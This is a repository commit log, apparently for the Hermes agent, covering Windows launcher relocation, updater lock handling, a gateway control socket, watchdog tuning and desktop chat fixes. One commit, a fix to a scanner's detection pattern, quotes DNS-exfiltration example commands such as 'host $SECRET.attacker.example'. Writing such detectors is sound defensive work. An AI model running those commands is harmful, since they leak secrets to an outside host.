Commit Graph

24597 Commits

Author SHA1 Message Date
Teknium f4067774aa fix(update): token-based control-plane classifier + live E2E for the Desktop-lifecycle cold-start skip (#76129 salvage follow-up)
On top of @686f6c61's premise-corrected #76745:

- _looks_like_desktop_control_plane now uses the parser-derived
  _hermes_holder_subcommand instead of substring matching — the
  #90778/#91869 class ('-m dashboard chat' and 'kanban --preserve-cache'
  argv no longer read as control planes). Regression test added,
  sabotage-verified (reverting to substrings fails it).
- Live E2E (this host, real processes + real spawn ledger): live
  supervised serve owns lifecycle; killed spawner (orphan) does not;
  dead serve entry excluded; empty ledger does not.
- Live Windows E2E for the wine2e lane: real self-registered ledger
  entry suppresses the actual cold-start plan; dead serve restores it;
  holder-scan fallback rung proves the token classifier live.

Co-authored-by: 686f6c61 <github@00b.tech>
2026-08-22 21:36:44 -07:00
686f6c61 4ccc4b6931 fix(update): skip Windows gateway cold-start when Desktop owns lifecycle
Vestigial autostart is not proof the user wants a standalone gateway
run. When Desktop currently supervises this install's control plane,
the updater must not spawn a competing messaging daemon. Serve is not
treated as gateway-equivalent.
2026-08-22 21:36:44 -07:00
Teknium 87b645f52c fix(desktop): a failed Bot Chat registry lookup no longer forks the bot's forever chat
findExistingCanonicalChat() swallowed every lookup error and returned
null — indistinguishable from 'this bot has no Bot Chat yet' — so a
transient RPC failure against a just-restarted backend (the exact
post-desktop-update window) sent createCanonicalChat() straight to
session.create, minting a fresh 'Bot Chat' while the real one (data
intact, hidden) still held the canonical title. Users experienced this
as bots losing all context after every desktop update.

The lookup now fails CLOSED: a failed registry consultation throws,
both open paths surface their existing 'try again' toast, and
session.create can never fire off an unknown ownership state.

Tests: two new VM-executed regression tests (sabotage-verified — both
fail with the old fail-open catch); hide-bot-chats source-shape regex
updated for the new layout. 364/364 plugin tests green.
2026-08-22 21:24:30 -07:00
Teknium c9c44d0df9 Merge pull request #92636 from NousResearch/fix/windows-launcher-managed-bin
fix(windows): stage hermes launchers in the managed binary dir, not the git checkout
2026-08-22 20:58:00 -07:00
emozilla 0b01599eef fix(tests): repair the two Linux-lane CI failures on this branch
Both failed only in the full Linux suite, which the targeted local
battery never ran:

- test_update_zip_two_phase.py's AST guard (#76105) flags any code
  literal "Scripts" in hermes_cli as an open-coded venv layout.
  migrate_windows_bin_path's legacy PATH key now derives it via
  venv_bin_dir(root / "venv", windows=True) — same value, canonical
  helper. The literal `venv` component stays: the key must match what
  the pre-#83797 installer wrote to the registry, not where the venv
  lives now.
- The managed-bin marker tests built expected PATH entries from
  tmp_path, so on a POSIX host they compared forward-slash strings
  against the backslash markers and could never match. Markers match
  Windows registry PATH entries, so the tests now feed Windows-shaped
  literals — host-independent, same contract.
2026-08-22 23:10:32 -04:00
Teknium fd760435c6 test(bedrock): make the botocore stub windows airtight — kills the vendored-import flake
CI flake mechanism (PR #92617 red, reproduced standalone): tests plant
fake botocore modules via patch.dict; when the REAL botocore.exceptions
is first imported in an interpreter state where a fake parent is (or
was) installed, its 'from botocore.vendored import requests' resolves
against a module with no __path__ and every exception test in the worker
dies with "No module named 'botocore.vendored'" — ordering-dependent,
so green locally, red in CI workers.

Defenses (both, in depth):
- test_bedrock_adapter.py pre-imports the real botocore.exceptions at
  module scope, before any test can stub sys.modules — later imports are
  cache hits that can never re-execute the vendored import under a
  poisoned parent. Proven standalone: fake-parent repro fails without
  the pre-import, succeeds with it.
- autouse _boto_sys_modules_hygiene fixtures in all three files that
  plant fake boto* modules (adapter, integration, model-picker):
  snapshot every boto* sys.modules entry before each test, evict+restore
  after — no stub window can leak state into a later test regardless of
  worker ordering.
- importorskip targets botocore.exceptions (the module the tests
  actually need) instead of bare botocore, so a torn install skips
  instead of erroring.

148/148 across the four affected suites.
2026-08-22 19:30:10 -07:00
Teknium 0c435f4601 fix(update): reword refusal message — footgun linter matched prose 'venv open (' as bare open() 2026-08-22 19:30:10 -07:00
Teknium 83864c0b5d fix(update): a contended venv is never mutated — failed shim quarantine now refuses instead of warning (#87331)
The #87331 remaining half: when hermes.exe (or a sibling shim) could not
be renamed aside, the updater printed a warning and ran the installer
anyway — which died partway on the same locks and stranded the venv
between versions.

- _run_quarantined_install gains strict_quarantine: any shim whose
  rename failed every retry aborts BEFORE the install command runs
  (successful renames rolled back), raising ShimQuarantineError.
- The update dependency sync passes strict_quarantine=True. The update
  boundary turns the error into a refusal: defer via the
  update-incomplete marker, exit 2 (recorded as refused by the receipt
  net), never ZIP-fallback. Post-sync repair installs keep warn-and-try
  (their venv is already mutated; refusing buys nothing).
- The recovery installer (_install_repair._run_install_cmd) is strict
  unconditionally: marker survives, next launch retries after the
  holder exits.
- Live Windows E2E for the wine2e lane: a real child holds hermes.exe
  without FILE_SHARE_DELETE (the exact field lock shape), strict path
  refuses with zero installer invocations, releases roll back, and the
  same path proceeds once the holder exits.

Sabotage-verified: reverting the strict wiring makes both fail-closed
tests fail.
2026-08-22 19:30:10 -07:00
emozilla fe95ed3930 Merge origin/main: reconcile with PR #92092 (in-checkout launcher restore)
PR #92092 fixed the same vanished-launcher bug by restoring copies into
the legacy in-checkout hermes-agent\bin from the update tail. That
location is what this branch removes: untracked files there are swept
by the update autostash on every cycle (restore/sweep treadmill, plus a
parked stash entry per update under --keep-stash), and unconditional
exe copies break on relocatable venvs ('uv trampoline failed to
canonicalize script path'). This branch's managed-binary-dir layout
supersedes both mechanisms, so the merge resolves to it:

- drop _sync_windows_cli_launchers and its _ensure_acp_launcher call
  (Windows staging/repair lives in ensure_windows_bin_launchers at
  process start and migrate_windows_bin_path in the update tail);
  _ensure_acp_launcher is a Windows no-op again
- keep #92092's genuinely better installer semantics: staging stays in
  a dedicated Install-HermesCommandLaunchers function that throws
  BEFORE any PATH mutation when the required launcher cannot be staged
  and verified -- previously Set-PathVariable could put an empty dir on
  PATH and still print 'hermes command ready'. Reworked for this
  branch's layout: caller passes the destination ($HermesHome\bin),
  launcher form follows the venv (exe copy vs .cmd delegator), and the
  verify step accepts either form
- rework #92092's AST-lifted PowerShell test for the new function
  signature, keeping its fail-before-PATH-mutation assertions and
  adding relocatable-venv form-selection coverage
- drop tests/hermes_cli/test_windows_cli_launcher_repair.py (pinned the
  superseded in-checkout mechanism; equivalent and broader coverage
  lives in tests/hermes_cli/test_ensure_windows_bin_launchers.py)
2026-08-22 22:16:38 -04:00
Teknium 7a54ab22e6 fix(gateway): control-socket hardening from #92447 post-merge review
- bind under umask 0o177 so the socket is never world-connectable, even
  pre-chmod (review pt 3)
- verb handlers run in an executor: state-file reads stay off the
  adapter event loop (pt 2)
- inventory dedupes one multiplex gateway answering identify for several
  homes — one runtime record per pid, with regression test (pt 1)
- v1 wire contract (one request per connection) documented in the module
  docstring (pt 5); /tmp-unwritable skip in the short-home test

Live-verified: perms 600 at bind, identify 4.3ms via executor path, 20
rapid queries healthy.
2026-08-22 18:05:26 -07:00
Teknium 530028c213 test(gateway): pipe E2E compares the server's self-reported pid, tree-kills the uv trampoline
First windows-latest run proved the design premise in miniature: identify
answered pid 616 while Popen.pid said 8000 — uv's Windows python.exe is a
trampoline that spawns the real interpreter as a child, so the spawner's
PID view is wrong and the process's self-declaration is right. Assert
against the child's printed os.getpid(); use taskkill /T for teardown.
2026-08-22 16:45:00 -07:00
Teknium 67aac4d863 fix(gateway): control-socket fallback survives deep TMPDIR; tests bind-location-aware
CI runners put pytest tmp roots past sun_path, which routed every test
home through the fallback: two tests assumed in-home binding. Tests now
assert against the resolved bind location, and the fallback itself
prefers /tmp when tempfile.gettempdir() is too deep to fit sun_path.
2026-08-22 16:45:00 -07:00
Teknium d1c84fc5d3 test(gateway): live Windows named-pipe E2E for the control socket (wine2e lane)
Real child process binding the real pipe via the proactor loop with the
default handlers; real sync client; real collect_fleet_versions consumer;
kill-and-fallback proof. Skipped everywhere except a real Windows host.
2026-08-22 16:45:00 -07:00
Teknium 60b6269142 feat(gateway): gateway-owned control socket — identify/status verbs, fleet consumers prefer it over scans (#92091 step 1)
The gateway now creates a local control socket at startup (Unix domain
socket at $HERMES_HOME/gateway.sock with a pointer-file fallback for
long paths; named pipe on Windows) and answers versioned JSON verbs:

- identify: pid, profile, hermes_home, code_sha/code_version (#91283
  stamps, now queryable live), self-declared supervisor kind, start_time
- status: the live runtime-status payload, answered by the process itself

Bound immediately after the PID-file O_EXCL claim (the moment the
process becomes the authoritative gateway for its HERMES_HOME), removed
on clean shutdown; a successor clears any stale socket on bind. Strictly
non-fatal: bind failure only means consumers use the old path.

Consumers migrated (observability only, scan layer demoted to fallback,
never deleted):
- collect_fleet_versions() (post-update fleet matrix): prefers a live
  identify answer over gateway_state.json; entries carry source=socket
- collect_runtime_inventory() (hermes update --plan): prefers the
  socket, and takes the gateway's own supervisor declaration instead of
  inferring it from PID scans

Old gateways mid-upgrade, crashed processes, and bind failures behave
exactly as before. Never a TCP port; filesystem/pipe ACLs are the auth
boundary (0600 socket).

Part of #91277 (fleet-update reliability). Design: #92091.
2026-08-22 16:45:00 -07:00
kshitij 987064caa4 fix: restore generic corruption match in FTS self-heal
The PR narrowed _is_fts_write_corruption_error to only match FTS5-specific
'fts5: corrupt structure record' errors, dropping the generic 'database disk
image is malformed' match. But FTS shadow table corruption (the common case)
raises the generic error on SQLite < 3.53, not the FTS5-specific one. This
broke FTS self-heal for 10 existing tests and for users on older SQLite.

Restore the generic match via is_malformed_db_error. Safety is preserved
because the FTS rebuild only touches derived indexes — if the damage is
actually in a canonical B-tree, the rebuild itself fails and the write
propagates.

Also restore the original test assertion and remove the
test_generic_malformed_write_fails_closed test whose premise (generic
corruption should not trigger FTS rebuild) was wrong for the FTS self-heal
path.
2026-08-23 02:55:03 +05:30
Bruce Xu 50bbcbf2b4 fix(state): fail closed on unscoped SQLite corruption 2026-08-23 02:55:03 +05:30
kshitij c80a0a551c Merge pull request #92529 from kshitijk4poor/chore/author-map-brucexu-eth
chore: AUTHOR_MAP brucexu-eth
2026-08-23 02:49:46 +05:30
kshitij 85044caebe chore: AUTHOR_MAP brucex2710@gmail.com -> brucexu-eth
For salvage PR #92523 (PR #91585 by @brucexu-eth).
2026-08-23 02:46:59 +05:30
sovthpaw 13f4cfebfa fix(skills_guard): --host flags no longer flagged as DNS exfiltration
The dns_exfil pattern matched the 'host' DNS command inside flag names
like llama.cpp/vllm's --host 127.0.0.1 --port $PORT, so any plugin
shipping a .sh launcher script was blocked as dangerous. A negative
lookbehind (?<![-/]) excludes flag/path contexts while real DNS-lookup
exfiltration (host $SECRET.attacker.example, nslookup $X, dig $(...))
still trips the pattern.

Salvaged from PR #92382 (regex fix + regression test); scan-scoping
half rejected separately.
2026-08-22 11:15:44 -07:00
emozilla 0605279b35 test: guard os.geteuid() for Windows in the ACP launcher tests
os.geteuid() does not exist on Windows, so collecting the module
crashed with AttributeError before any test ran. Branch on
hasattr(os, "geteuid") the same way the code under test does.
2026-08-22 13:39:04 -04:00
emozilla 5d5179d7a9 fix(windows): remove the hermes launchers on uninstall
Every uninstall mode deletes the code checkout, but the launchers in
the managed binary dir (%LOCALAPPDATA%\hermes\bin) live outside it and
survived -- so `hermes` in a new terminal resolved to a launcher whose
venv target was gone and errored, which reads worse than
command-not-found.

remove_windows_bin_launchers deletes both launcher forms (.exe/.cmd)
from the managed binary dir in every uninstall mode, anchored on the
default Hermes root so profile sessions cannot redirect the sweep into
profiles\<name>\bin. When the uninstall itself runs through the
launcher, that exe is mandatory-locked against deletion but not rename
(the same fact _quarantine_running_hermes_exe relies on), so it falls
back to renaming the launcher aside.

The managed uv (uv*.exe) in the same dir survives, and the hermes\bin
PATH entry is swept only on a full wipe from the default root
(include_managed_bin) -- a keep-data uninstall keeps the still-working
uv resolvable for reinstalls.

A lockstep test parses install.ps1's staging loop so the swept names
cannot drift from the staged names silently.
2026-08-22 13:39:04 -04:00
emozilla 679e9cd294 fix(windows): stage hermes launchers in the managed binary dir, not the git checkout
The installer staged the hermes/hermes-acp launcher copies at
hermes-agent\bin -- inside the git working tree -- and put that dir on
the user PATH (#84452). The update command's pre-pull autostash
(git stash push --include-untracked) swept those untracked, unignored
copies off disk, and once the desktop updater stopped re-applying
stashes (--keep-stash, 5dd221d442) nothing restored them: `hermes`
stopped resolving in every new terminal on every desktop-updated
install.

Move the canonical launcher home to the managed binary dir
(%LOCALAPPDATA%\hermes\bin, next to the managed uv) -- outside the
checkout, where no git operation can ever touch it. The dir is
per-machine and shared by every profile, so all anchoring uses
get_default_hermes_root(), never HERMES_HOME (which points inside
profiles\<name> under `hermes -p`).

The copy design also had a second latent break: managed-uv rebuilds
create relocatable venvs, and a relocatable venv's exe trampoline
resolves relative to its own location -- a copy outside venv\Scripts
dies with 'uv trampoline failed to canonicalize script path'. Launcher
form now depends on the venv (lockstep in install.ps1 and
_install_repair.py): exe copy for normal venvs, a .cmd delegator
invoking the in-venv exe by absolute path for relocatable ones. Either
form counts as present, so pre-rebuild exe copies are left alone.

Delivery to the existing fleet, per cohort:

- already-broken installs cannot run the CLI, so an import-time heal in
  hermes_cli.main (ensure_windows_bin_launchers) re-stages missing
  launchers when the desktop app spawns its backend -- the one channel
  that still reaches them. Gates fail toward inaction: canonical dir
  only for the managed clone, legacy hermes-agent\bin only while the
  user PATH still resolves through it (some pre-managed-uv installs
  have no hermes\bin PATH entry; the legacy re-stage is what fixes
  those). Staging-name + os.replace keeps concurrent process starts
  from tearing a launcher; the helper never raises.
- healthy old-layout installs migrate in the update tail
  (migrate_windows_bin_path): stage canonical launchers, verify them
  BEFORE touching the registry, prepend hermes\bin to the user PATH,
  strip the legacy entries (hermes-agent\bin and venv\Scripts, #83797),
  preserving REG_EXPAND_SZ and raw %VARS%. The legacy dir's files stay
  on purpose -- configs holding absolute launcher paths keep working;
  only the sweepable PATH resolution route goes.
- fresh installs get the new layout from install.ps1 directly.

/bin/ is gitignored so the one update that DELIVERS this fix cannot
sweep pre-migration launchers a final time under the old rules; the
gitignore line, the legacy re-stage branch, and the update-tail call
are transition machinery with a named expiry once the fleet has
migrated.

Also rewrites _ensure_acp_launcher's stale Windows paragraph to match
(raw docstring fixes its invalid \S escape) and updates the Windows
native docs to the new layout, with a docs<->installer parity test.
2026-08-22 13:38:56 -04:00
Teknium 0cde4dd93a chore: add contributor email mapping for EAbaracus 2026-08-22 10:38:27 -07:00
Teknium db7dda468f chore: anchor artifact ignore rules to repo root; block them from Docker image layers
Follow-up to the cherry-picked cleanup: the default.tar.gz profile export
was also carried into published container images by the Dockerfile's
'COPY . .' layer because .dockerignore had no matching pattern. Anchor
the .gitignore rules to repo root (per review feedback on #91712) and
add the same set + /*.tar.gz to .dockerignore so root archives can never
reach an image layer again.
2026-08-22 10:38:27 -07:00
EAbaracus 0af2858a3a chore: remove committed root artifacts (log.txt, sqlite_leak_fix.png, default.tar.gz)
These were committed to the repo root but are build/debug byproducts:
- log.txt: empty 0-byte file
- sqlite_leak_fix.png: unreferenced 832KB image
- default.tar.gz: 1.96MB, only used as a test fixture OUTPUT (tests write it
  to a temp dir, never read from repo root)

Add ignore rules so they cannot be re-committed. Part of audit cleanup
(HA-D11-001 / HA-D3-001).
2026-08-22 10:38:27 -07:00
hermes-seaeye[bot] 4b860d8193 fmt(js): npm run fix on merge (#92399)
Co-authored-by: github-actions[bot] <github-actions[bot]@users.noreply.github.com>
2026-08-22 17:34:58 +00:00
Teknium c0055b3a6d chore: map contributor email for Jackal991 2026-08-22 10:30:46 -07:00
Jackal991 67a5d7bcf0 fix(desktop): resolve Win10 translucency defaults from platform, not glass capability
Closes #90824
2026-08-22 10:30:46 -07:00
Teknium 40f3e58f6d fix(desktop): stop manufacturing duplicate toolCallIds at the fold, repair poisoned cached tails
Two follow-up layers on top of the salvaged runtime-boundary guard (#87871):

- coalesceToolOnlyAssistants now folds via concatToolPartsUnique, dropping an
  incoming tool-call part whose toolCallId the predecessor already carries.
  Two individually-clean rows sharing an id (structural carry-over re-attaching
  a cached row's calls) no longer become one crashing message — and no longer
  render the same call twice. Root-cause analysis by @marketing2981 (#87857).
- loadTranscriptTail repairs a poisoned persisted tail on read; installs
  already carrying a duplicate in hermes.transcript-tail.v1:* stop
  crash-looping after upgrade instead of re-deriving the same collision
  every launch.
- Regression tests for all three layers, incl. the end-to-end repository link
  test (from #92093 by @RasputinKaiser) and the cross-message ids-stay-
  untouched contract (per-response tool numbering, e.g. Kimi — #90545 by
  @M7MMAD-OMAR). Each test sabotage-verified against its reverted layer.
2026-08-22 10:30:31 -07:00
PRATHAMESH75 9f8dca34dc fix(desktop): dedupe duplicate toolCallId parts at the runtime boundary (#87857)
A message whose content carries two tool-call parts with the same
toolCallId makes assistant-ui's useResources throw
"Duplicate key toolCallId-<id> in useResources", which the workspace
error boundary turns into a renderer crash loop that blanks the window.
The existing withUniqueToolCallIds dedup runs only on the static
toChatMessages output; the streaming reducer (which can append the same
tool-call part twice under an optimistic-update ordering) and tool-only
assistant coalescing both reach the runtime without passing through it.

Add withUniqueToolCallIdsWithinMessage and apply it in
useRuntimeMessageRepository, the single ChatMessage->ThreadMessage
boundary shared by the static and streaming paths, right where the
repeated-message.id guard already lives. The dedup is per-message (the
assistant-ui key space is per-message) and returns the same reference
when clean, so the repository's identity cache is untouched in the
common no-duplicate case.
2026-08-22 10:30:31 -07:00
Kshitij Kapoor 999703fd43 refactor(gateway): hoist watchdog constants to the canonical import; drop dead or-fallbacks
/simplify-code quality reviewer: _start_loop_liveness_guards re-imported
the DEFAULT_LOOP_WATCHDOG_* constants locally although the file's
canonical shutdown_watchdog import block already exists, and the
'or DEFAULT' guards re-clamped values GatewayConfig.from_dict already
validates — unreachable for config-loaded values. getattr defaults keep
the config=None test path working.
2026-08-22 20:40:23 +05:30
Kshitij Kapoor 8ee0103ea2 fix(gateway): finite-bounded watchdog knob validation + wire keys through load_gateway_config
Addresses both review findings from @egilewski on #89134:

- Non-finite values: _coerce_int now degrades int(inf) (OverflowError
  previously ABORTED gateway config loading); the clamp requires
  math.isfinite plus sane upper bounds (interval <=3600s, timeout
  <=600s, strikes <=1000), falling back to the shutdown_watchdog
  constants.
- Loader wiring: load_gateway_config builds gw_data FLAT and never
  forwarded the yaml gateway: section, so loop_watchdog* keys —
  including the PRE-EXISTING loop_watchdog bool documented in
  config_defaults — were silently ignored on the real startup path.
  Bridged with the established top-level-wins/nested-fallback pattern.

E2E: config.yaml with loop_watchdog:false + strikes:12 + interval:.inf
now yields False/12/30.0 through the real loader.
2026-08-22 20:40:23 +05:30
Kshitij Kapoor 3616145723 fix(gateway): keep loop-watchdog default at 3 strikes; dedupe constants; register knobs in config defaults
Downscope of the salvaged #89134 per review: the 3->8 default raise was
symptom tolerance for the false-positive class the off-loop heartbeat +
two-witness probe fixes at the root — fleet-wide it would only delay
genuine-wedge recovery ~2.7x. The three tuning knobs keep independent
operator value and stay:

- default max_strikes back to 3 everywhere (constant, dataclass,
  from_dict fallback, floor clamp, tests)
- gateway/config.py + gateway/run.py now reference the
  shutdown_watchdog DEFAULT_* constants instead of duplicating literals
  in three places (drift hazard)
- knobs registered in hermes_cli/config_defaults.py alongside the
  sibling gateway.loop_watchdog bool
2026-08-22 20:40:23 +05:30
devops aa08cb8ccb fix(gateway): make loop-liveness watchdog tolerant of transient reconnect stalls
The event-loop liveness watchdog (gateway.shutdown_watchdog) hard-exited with
code 75 after 3 consecutive missed probes (probe_interval=30s, timeout=10s,
max_strikes=3), i.e. ~90-120s of loop block. Telegram/Discord reconnect during
a network blip does synchronous socket I/O on the loop and can block it for
60-90s; these stalls self-recover (recurring fleet incidents on 2026-08-17
stalled cron dispatch ~21h via restart churn, kanban t_0f76430f).

Raise the default max_strikes 3->8 so a transient reconnect stall is tolerated
while a genuine multi-minute wedge still escalates, and expose the three
tolerance knobs via config.yaml (gateway.loop_watchdog_probe_interval_s /
_probe_timeout_s / _max_strikes) so operators can tune per deployment.

Refs: kanban t_70483f23
2026-08-22 20:40:23 +05:30
kshitij 261a4efb90 Merge pull request #92214 from kshitijk4poor/discord-picker-constants-followup
refactor(discord): derive picker capacity constants; drop last bare 25-option literal
2026-08-22 16:35:15 +05:30
kshitij 667c787a1c Merge pull request #92216 from kshitijk4poor/fix/p1-gateway-simplify-followups
fix(gateway): close the boot-send TOCTOU replay window + P1-batch simplify follow-ups
2026-08-22 16:30:55 +05:30
Kshitij Kapoor a18f90847b refactor(gateway): promote parse_systemd_duration_to_us to public
hermes_cli/gateway.py's restart-wait sizing (from #92175) was the only
cross-module import of an underscore-private shutdown_forensics helper.
Promote it (private alias retained for existing patchers).
2026-08-22 16:26:51 +05:30
Kshitij Kapoor 1db0a7d825 refactor(telegram): share the flood-wait cap between send and edit paths
Extract _FLOOD_INLINE_WAIT_CAP_SECS + _flood_cap_result so the 5s cap
and the flood_control:{wait} error contract cannot drift between the
edit path and the send path #92173 added.
2026-08-22 16:26:51 +05:30
Kshitij Kapoor bdd281d078 refactor(gateway): route kanban notifier writer offloads through _to_thread_process_service
The notifier watcher offloads the same class of guarded Kanban writers
(_kanban_advance/_kanban_rewind/_kanban_unsub) as the dispatcher ticks
that #92172 wrapped. Apply the same offload-boundary scrub to all 10
writer sites for uniform defense-in-depth (read-only _collect stays on
bare to_thread), and reword the helper docstrings to state the
defense-in-depth relationship to spawn isolation accurately.
2026-08-22 16:26:51 +05:30
Kshitij Kapoor 684e95a001 fix(gateway): claim ledger rows and clear resume_pending inline before the abandonable boot-send task
Post-merge follow-up to #92173. The claim + resume-clear lived inside
the boot-send task AFTER the restart notification — itself a
flood-controllable send. If that notification outlived the restore-gate
timeout, the gate opened with zero rows claimed and the resume
scheduler replayed turns whose answers were already in the ledger,
while the background task later redelivered them too (duplicate
delivery + re-paid turn).

Split _redeliver_pending_obligations into _claim_pending_obligations
(pure DB: sweep + resume clear, awaited inline before the send task
exists) and _redeliver_claimed_obligations (network half, stays inside
the bounded task). The original name remains as a composition wrapper.
Mutation-checked: both updated gate tests fail on pre-split run.py.
2026-08-22 16:26:51 +05:30
kshitijk4poor 9154421b11 refactor(discord): use _DISCORD_SELECT_MAX_OPTIONS in ChoicePickerView
Final-review follow-up: swap the bare [:25] slice for the new constant.
Behavior-identical (same 25); removes the last bare option-cap literal
in the file. ChoicePickerView feeds finite /reasoning and /fast choice
lists, so no functional change.
2026-08-22 16:23:39 +05:30
kshitijk4poor c925cc8eb8 refactor(discord): derive model-select capacity from the row/option constants
Final-review follow-up: replace the bare 75 in the shown-count with
_DISCORD_MODEL_SELECT_CAPACITY so it can never desync from what the
partitioned menus actually render.
2026-08-22 16:23:39 +05:30
kshitijk4poor 4a6b362178 review follow-up: trim overreaching comment sentence, pin durable-copy assertion
- Drop the 'aborted before its tail' no-op sentence: early aborts are
  intercepted by the aborted/no-progress branches and never reach the
  would-grow check, so the framing overstated its relevance (2c finding).
- Test now also asserts the durable model_config copy still holds the
  armed runway after the refusal — locking in the memory==disk half of
  the contract, not just the in-memory value.
2026-08-22 16:07:12 +05:30
kshitijk4poor 4c76ec81a9 fix(compression): restore the prune runway when a would-grow refusal keeps the transcript
compress()'s successful tail zeroes _proactive_prune_rearm_tokens in
memory — correct for a committed compaction, whose boundary already broke
the prompt-cache prefix. But compress_context's anti-growth guard can then
REFUSE the result and keep the original transcript, whose cached prefix is
intact. The refusal returned with the in-memory runway still at 0 while the
durable model_config copy kept the old value, so:

- the next eligible iteration's proactive prune fired without the regrowth
  interval #79640 introduced — an immediate, unthrottled cache-breaking
  rewrite (#91830's bug class), and
- memory and disk disagreed until a restart silently re-armed the throttle
  from the stale durable row.

The refusal branch now restores the runway from the attempt snapshot — the
same targeted restore the rotation-failure rollback already performs.

Sibling non-commit branches audited: aborted (returns before the tail
zero), no-progress (tail zero only runs after a real boundary rewrite,
which no-progress by definition lacks), empty-transcript (built-in tail
never returns []), fence-denied (full snapshot restore already covers the
runway), in-place DB failure (in-memory transcript keeps the compacted
form, so the zeroed runway is consistent with it).

Fixes the reachable half of the structural asymmetry flagged in #91830.
2026-08-22 16:07:12 +05:30
fangliquan a4f16e3fef fix(gateway): retain failed replacement evidence 2026-08-22 15:27:26 +05:30
fangliquan 596bfc557f fix(gateway): distinguish failed systemd replacements 2026-08-22 15:27:26 +05:30
fangliquan 83b09ebd0a fix(gateway): make handoff recovery idempotent 2026-08-22 15:27:26 +05:30
fangliquan 91fb175188 fix(gateway): preserve systemd handoff recovery 2026-08-22 15:27:26 +05:30
fangliquanflq 5b024c7ccc fix(gateway): make systemd the sole restart owner 2026-08-22 15:27:26 +05:30
fangliquan f12cd04015 fix(gateway): isolate kanban dispatcher to_thread context
Spawn-time Context isolation cannot rewrite an already-running watcher task. Run dispatcher SQLite offloads in an empty Context so write_txn no longer false-trips after delegate_task, while real child callers still hit the mutation guard.
2026-08-22 15:25:50 +05:30